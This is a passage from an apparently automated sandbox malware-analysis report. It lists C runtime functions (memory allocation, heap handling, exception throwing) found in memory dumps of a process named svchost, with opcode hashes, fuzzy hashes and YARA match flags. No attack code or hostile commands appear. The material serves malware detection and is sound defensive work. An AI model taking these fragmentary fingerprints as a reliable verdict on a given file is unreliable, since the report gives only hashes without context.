                                                                                                              • API String ID: 3340475617-0
                                                                                                              • Opcode ID: 8eb60a56db472e57e570ada47b5509db5d723c4121a08cc2a261389b8288715e
                                                                                                              • Instruction ID: c083dfad70620506d0968b8b2a66198515812d68bb4eda04a1dcae6c5d46e05c
                                                                                                              • Opcode Fuzzy Hash: 8eb60a56db472e57e570ada47b5509db5d723c4121a08cc2a261389b8288715e
                                                                                                              • Instruction Fuzzy Hash: 3F01DEB1900B04DFE3209F7A9881B97BAE9FF45319F11482ED5AE87301D63578448F70
                                                                                                              Function 02A069C4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _malloc.LIBCMT ref: 02A069DE
                                                                                                                • Part of subcall function 02A06930: __FF_MSGBANNER.LIBCMT ref: 02A06949
                                                                                                                • Part of subcall function 02A06930: __NMSG_WRITE.LIBCMT ref: 02A06950
                                                                                                              • std::exception::exception.LIBCMT ref: 02A06A13
                                                                                                              • std::exception::exception.LIBCMT ref: 02A06A2D
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 02A06A3E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 2388904642-0
                                                                                                              • Opcode ID: 5cc5bd0d1538292c0d459ef85d17af099679b52743cea41d158f997f20c39b5d
                                                                                                              • Instruction ID: cc81806a0c6d4893a6b2b590a6bb143c4d1a3318f0d71405447c2cb85c1b7340
                                                                                                              • Opcode Fuzzy Hash: 5cc5bd0d1538292c0d459ef85d17af099679b52743cea41d158f997f20c39b5d
                                                                                                              • Instruction Fuzzy Hash: ABF0F431800259A6DB04EB94EDD4AAD7BFEAF42F18F14001AE4019A4D0CFB1D9E08F94
                                                                                                              Function 04C7F116 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _malloc.LIBCMT ref: 04C7F130
                                                                                                                • Part of subcall function 04C7F082: __FF_MSGBANNER.LIBCMT ref: 04C7F09B
                                                                                                                • Part of subcall function 04C7F082: __NMSG_WRITE.LIBCMT ref: 04C7F0A2
                                                                                                              • std::exception::exception.LIBCMT ref: 04C7F165
                                                                                                              • std::exception::exception.LIBCMT ref: 04C7F17F
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 04C7F190
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 2388904642-0
                                                                                                              • Opcode ID: 7daa1a2e8a1edc39e4a8b0fa374d655afe2b4b7aab490ef2bd333e68d320cb02
                                                                                                              • Instruction ID: 43f572c7e39f586dcad465dc428dc626e0798710e9f0f6547a7e8cf0e0b3be2f
                                                                                                              • Opcode Fuzzy Hash: 7daa1a2e8a1edc39e4a8b0fa374d655afe2b4b7aab490ef2bd333e68d320cb02
                                                                                                              • Instruction Fuzzy Hash: 89F02876500219ABEB00FB59DC949AE7BABEB04288FD4402DD50496190DB71E602DB50
                                                                                                              Function 02586560 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 02581420: HeapFree.KERNEL32(?,00000000,?,?,?,025840A1,?,00000000,02584029,?,7591DFA0,02583628), ref: 0258143D
                                                                                                                • Part of subcall function 02581420: _free.LIBCMT ref: 02581459
                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 02586573
                                                                                                              • HeapCreate.KERNEL32(?,?,?), ref: 02586585
                                                                                                              • _free.LIBCMT ref: 02586595
                                                                                                              • HeapDestroy.KERNEL32 ref: 025865C2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Heap$Destroy_free$CreateFree
                                                                                                              • String ID:
                                                                                                              • API String ID: 4097506873-0
                                                                                                              • Opcode ID: e1f47d0f5c78f3ba68d6e1cac6c56751833c67353fda5955b196d4dff860c08c
                                                                                                              • Instruction ID: fbcaeabf34f40b9c713ce30f2746e584b88c46202fe4d75da73cc7f3f11b9d94
                                                                                                              • Opcode Fuzzy Hash: e1f47d0f5c78f3ba68d6e1cac6c56751833c67353fda5955b196d4dff860c08c
                                                                                                              • Instruction Fuzzy Hash: EDF0AFB55007029BD310AF24E808B23BBF8FF84710F51481CE85993240DB74F825CF90
                                                                                                              Function 04DFCDD0 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DF1420: HeapFree.KERNEL32(?,00000000,?,?,?,04DF40B1,?,00000000,04DF4039,?,7591DFA0,04DF3648), ref: 04DF143D
                                                                                                                • Part of subcall function 04DF1420: _free.LIBCMT ref: 04DF1459
                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 04DFCDE3
                                                                                                              • HeapCreate.KERNEL32(?,?,?), ref: 04DFCDF5
                                                                                                              • _free.LIBCMT ref: 04DFCE05
                                                                                                              • HeapDestroy.KERNEL32 ref: 04DFCE32
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Heap$Destroy_free$CreateFree
                                                                                                              • String ID:
                                                                                                              • API String ID: 4097506873-0
                                                                                                              • Opcode ID: 078bd04cc834ea6eaf439bdb1134f4ffbf2320569d852a22118ed23267623185
                                                                                                              • Instruction ID: c37dbd8064fe73f1108fe159d5b6cce6d4bc8dba9506345fd7c5fb6d7dd5c316
                                                                                                              • Opcode Fuzzy Hash: 078bd04cc834ea6eaf439bdb1134f4ffbf2320569d852a22118ed23267623185
                                                                                                              • Instruction Fuzzy Hash: 88F0AFB5200602ABE320AF25E808B57FBB8FF88B11F11851CE955C7200DB38F854CBA0
                                                                                                              Function 02A06C63 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                              • String ID:
                                                                                                              • API String ID: 865245655-0
                                                                                                              • Opcode ID: d35f9130b0fb932ae7d1da433330ecf3e9bae56744771b6e30fbfe98e25e9986
                                                                                                              • Instruction ID: a24cac9c6a284c12eb9d8f85ac33be9fcdff7fac5a84baa7140c5fca1d6c81e4
                                                                                                              • Opcode Fuzzy Hash: d35f9130b0fb932ae7d1da433330ecf3e9bae56744771b6e30fbfe98e25e9986
                                                                                                              • Instruction Fuzzy Hash: 28F06278640241BBC704AFB0EAC880F7BAEAF88748720C454E9458B292DE35D8468EA1
                                                                                                              Function 04C7F3D3 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                              • String ID:
                                                                                                              • API String ID: 865245655-0
                                                                                                              • Opcode ID: 9e7d94f6b78f27a75255a1ae6a0e5eac7466ec8d6979fea6d65de3141a961281
                                                                                                              • Instruction ID: 83c9321d2a408bea1259aa2187201295b8de69f44c5ea41480ea690ce532a84d
                                                                                                              • Opcode Fuzzy Hash: 9e7d94f6b78f27a75255a1ae6a0e5eac7466ec8d6979fea6d65de3141a961281
                                                                                                              • Instruction Fuzzy Hash: B8F06274540295AFE704BF65C98480A7BAABF4424C325845CEC048B321DA35E8469AA1
                                                                                                              Function 04C79E6F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free_malloc
                                                                                                              • String ID: &
                                                                                                              • API String ID: 845055658-3042966939
                                                                                                              • Opcode ID: 5e5b5c576005100c852a822884550fadc31d97c59bbf8ecacd7d3e80cca5e8cf
                                                                                                              • Instruction ID: cc030dd99ed6aa41c8ccce9d79270763f1cb7e980d5b511fbb92ba3345acf7dd
                                                                                                              • Opcode Fuzzy Hash: 5e5b5c576005100c852a822884550fadc31d97c59bbf8ecacd7d3e80cca5e8cf
                                                                                                              • Instruction Fuzzy Hash: 415156B1E001199FEB00EFA5C885EEEB7BAFF48314F148559E905B7250D734BA05CBA1
                                                                                                              Function 04C7C31F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memset_wcsrchr
                                                                                                              • String ID: D
                                                                                                              • API String ID: 1675014779-2746444292
                                                                                                              • Opcode ID: 90e19d66a76d93ebeaa59610f971ef365756e86a1b872d1638bf4d682c6e4523
                                                                                                              • Instruction ID: 1d153bb9ad98db88415313e3f4bb7f34c5f4ed1787f1fe1379fbfb28a541cf71
                                                                                                              • Opcode Fuzzy Hash: 90e19d66a76d93ebeaa59610f971ef365756e86a1b872d1638bf4d682c6e4523
                                                                                                              • Instruction Fuzzy Hash: AC31FD72A402187BF720ABA4DC8AFFF777DEB45710F104129FB05AA1C4DA716A0587A1
                                                                                                              Function 04DF9444 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 04DF946D
                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 04DF949A
                                                                                                              Strings
                                                                                                              • invalid string position, xrefs: 04DF9495
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Exception@8ThrowXinvalid_argumentstd::_
                                                                                                              • String ID: invalid string position
                                                                                                              • API String ID: 3614006799-1799206989
                                                                                                              • Opcode ID: 7fa41fb15548e43889cb742033b74a7be45777562fa7278cdf1a36f42e8a0745
                                                                                                              • Instruction ID: b72bb886051ea95c1cc28af9b7ee3bce58a2f086a6df55f76728635b4385efcb
                                                                                                              • Opcode Fuzzy Hash: 7fa41fb15548e43889cb742033b74a7be45777562fa7278cdf1a36f42e8a0745
                                                                                                              • Instruction Fuzzy Hash: 670126727002005BE734AE78CC9079AF795EF50328F120E6DE6568B6C0DB71F94487A4
                                                                                                              Function 02A06A77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __output_l.LIBCMT ref: 02A06AD2
                                                                                                                • Part of subcall function 02A06BBA: __getptd_noexit.LIBCMT ref: 02A06BBA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd_noexit__output_l
                                                                                                              • String ID: B
                                                                                                              • API String ID: 2141734944-1255198513
                                                                                                              • Opcode ID: 0e9a39c42b97edeaacd553980931243230b40991fa9776e4ab0e03b5aae516e6
                                                                                                              • Instruction ID: af086cc8045da83f5bad8805f3199dedb91249f5f6e6975f626d28c816ecfc30
                                                                                                              • Opcode Fuzzy Hash: 0e9a39c42b97edeaacd553980931243230b40991fa9776e4ab0e03b5aae516e6
                                                                                                              • Instruction Fuzzy Hash: 9801C0719002099FDF00AFA5EC80BEEBBF9FB08328F104155E924A62C0DB789551CBB5
                                                                                                              Function 04C7F1C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __output_l.LIBCMT ref: 04C7F224
                                                                                                                • Part of subcall function 04C7F32A: __getptd_noexit.LIBCMT ref: 04C7F32A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __getptd_noexit__output_l
                                                                                                              • String ID: B
                                                                                                              • API String ID: 2141734944-1255198513
                                                                                                              • Opcode ID: 24d6c1a3e6102abc97be550d239efeb380074cf53a155cef3fbb89e81f64d6ff
                                                                                                              • Instruction ID: a32271eea08eafd5383befcfde67329c320242101ad0570cae17629ba125bd86
                                                                                                              • Opcode Fuzzy Hash: 24d6c1a3e6102abc97be550d239efeb380074cf53a155cef3fbb89e81f64d6ff
                                                                                                              • Instruction Fuzzy Hash: AD018471D002099FEF10DFA5DC40BEE7BF5FB04368F144119E924A6280E774A502DB71
                                                                                                              Function 025870AA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __output_l.LIBCMT ref: 02587105
                                                                                                                • Part of subcall function 025871ED: __getptd_noexit.LIBCMT ref: 025871ED
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd_noexit__output_l
                                                                                                              • String ID: B
                                                                                                              • API String ID: 2141734944-1255198513
                                                                                                              • Opcode ID: 95d493ecf19bfc0a3d1b589b43083adfdb7a8b25648218124aa29c10e3d8faa5
                                                                                                              • Instruction ID: 7ae054daadc69d83b992097a28247d0d6c6db1d9c6507000c324a3e73938d7a5
                                                                                                              • Opcode Fuzzy Hash: 95d493ecf19bfc0a3d1b589b43083adfdb7a8b25648218124aa29c10e3d8faa5
                                                                                                              • Instruction Fuzzy Hash: 39011B7690424A9FDF10AFA4CC05AFEBBB5FB48364F244155E924B6280D7B49501CF69
                                                                                                              Function 04DF95C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 04DF95CF
                                                                                                                • Part of subcall function 04DFEFD6: std::exception::exception.LIBCMT ref: 04DFEFEB
                                                                                                                • Part of subcall function 04DFEFD6: __CxxThrowException@8.LIBCMT ref: 04DFF000
                                                                                                                • Part of subcall function 04DFEFD6: std::exception::exception.LIBCMT ref: 04DFF011
                                                                                                              • _memmove.LIBCMT ref: 04DF9605
                                                                                                              Strings
                                                                                                              • invalid string position, xrefs: 04DF95CA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                              • String ID: invalid string position
                                                                                                              • API String ID: 1785806476-1799206989
                                                                                                              • Opcode ID: 15deb8df2c794cf003be0d0c1b6f40d20846b01a13618dc52c3e95135e5c6c33
                                                                                                              • Instruction ID: d41fce2e676036e3850992e2b4a091b1cc383979a3d564d75033e06bddb535fd
                                                                                                              • Opcode Fuzzy Hash: 15deb8df2c794cf003be0d0c1b6f40d20846b01a13618dc52c3e95135e5c6c33
                                                                                                              • Instruction Fuzzy Hash: 5A0184B1B042414BD735CF6CEDA871AB6E69BC0614B260DADD282C7B49E671FC428750
                                                                                                              Function 04DF8480 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 04DF8493
                                                                                                                • Part of subcall function 04DFEF89: std::exception::exception.LIBCMT ref: 04DFEF9E
                                                                                                                • Part of subcall function 04DFEF89: __CxxThrowException@8.LIBCMT ref: 04DFEFB3
                                                                                                                • Part of subcall function 04DFEF89: std::exception::exception.LIBCMT ref: 04DFEFC4
                                                                                                              • _memmove.LIBCMT ref: 04DF84BE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                              • String ID: vector<T> too long
                                                                                                              • API String ID: 1785806476-3788999226
                                                                                                              • Opcode ID: 9c7f475150b73ec5c1c53c181daa8a629723b8b4e943e95a468c3df7c0acc00c
                                                                                                              • Instruction ID: 570b47f4ebbc945fc699d69abdfcbf459879fff233b9293e29d8aefc95922a6f
                                                                                                              • Opcode Fuzzy Hash: 9c7f475150b73ec5c1c53c181daa8a629723b8b4e943e95a468c3df7c0acc00c
                                                                                                              • Instruction Fuzzy Hash: 1901A2B17002069FDB34DFA8DC9192BB3E9EF54214315892EEA9BC7750E734F9008B61
                                                                                                              Function 02A13286 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 02A13295
                                                                                                                • Part of subcall function 02A09348: __getptd_noexit.LIBCMT ref: 02A0934B
                                                                                                                • Part of subcall function 02A09348: __amsg_exit.LIBCMT ref: 02A09358
                                                                                                              • __getptd.LIBCMT ref: 02A132A3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 803148776-1018135373
                                                                                                              • Opcode ID: b81fda4c84a4da75d5013dc174894f1bb50a21fbbe6e1ef4ba89ac83b3cd124b
                                                                                                              • Instruction ID: e4a6481d59dc6135712346ebb103f73184cbaa80d7bd6705bcc35f344065d0c4
                                                                                                              • Opcode Fuzzy Hash: b81fda4c84a4da75d5013dc174894f1bb50a21fbbe6e1ef4ba89ac83b3cd124b
                                                                                                              • Instruction Fuzzy Hash: F60169348003858ACF38AF64D5807ADF3BABF21321F6448AED881AA690DF34D981CF41
                                                                                                              Function 04C910F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 04C91102
                                                                                                                • Part of subcall function 04C8386A: __getptd_noexit.LIBCMT ref: 04C8386D
                                                                                                                • Part of subcall function 04C8386A: __amsg_exit.LIBCMT ref: 04C8387A
                                                                                                              • __getptd.LIBCMT ref: 04C91110
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 803148776-1018135373
                                                                                                              • Opcode ID: aba3be56db0cb330105e04e3fd05360b3ce0f0149d82b8a44c918ce0d40eef41
                                                                                                              • Instruction ID: 5eaf216fb1571c663fae4836892d347f8cf5619dbda6495d86e9cf4cf6e4bd5f
                                                                                                              • Opcode Fuzzy Hash: aba3be56db0cb330105e04e3fd05360b3ce0f0149d82b8a44c918ce0d40eef41
                                                                                                              • Instruction Fuzzy Hash: 38016D39800307BAEF349F26C449AAEB3F7AF0065AF68456ED44156691CF36AE81DB01
                                                                                                              Function 025938B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0259339E: __getptd.LIBCMT ref: 025933A4
                                                                                                                • Part of subcall function 0259339E: __getptd.LIBCMT ref: 025933B4
                                                                                                              • __getptd.LIBCMT ref: 025938C8
                                                                                                                • Part of subcall function 0258997B: __getptd_noexit.LIBCMT ref: 0258997E
                                                                                                                • Part of subcall function 0258997B: __amsg_exit.LIBCMT ref: 0258998B
                                                                                                              • __getptd.LIBCMT ref: 025938D6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 803148776-1018135373
                                                                                                              • Opcode ID: b81fda4c84a4da75d5013dc174894f1bb50a21fbbe6e1ef4ba89ac83b3cd124b
                                                                                                              • Instruction ID: 863907c4037d520eaed81345dd726c699dd8b2ca6a6688e3e0db03b866efd231
                                                                                                              • Opcode Fuzzy Hash: b81fda4c84a4da75d5013dc174894f1bb50a21fbbe6e1ef4ba89ac83b3cd124b
                                                                                                              • Instruction Fuzzy Hash: 80014B38C0060AEFCF349F22C4847ACBBB6BF44211F2444AED88696660CB708591CF49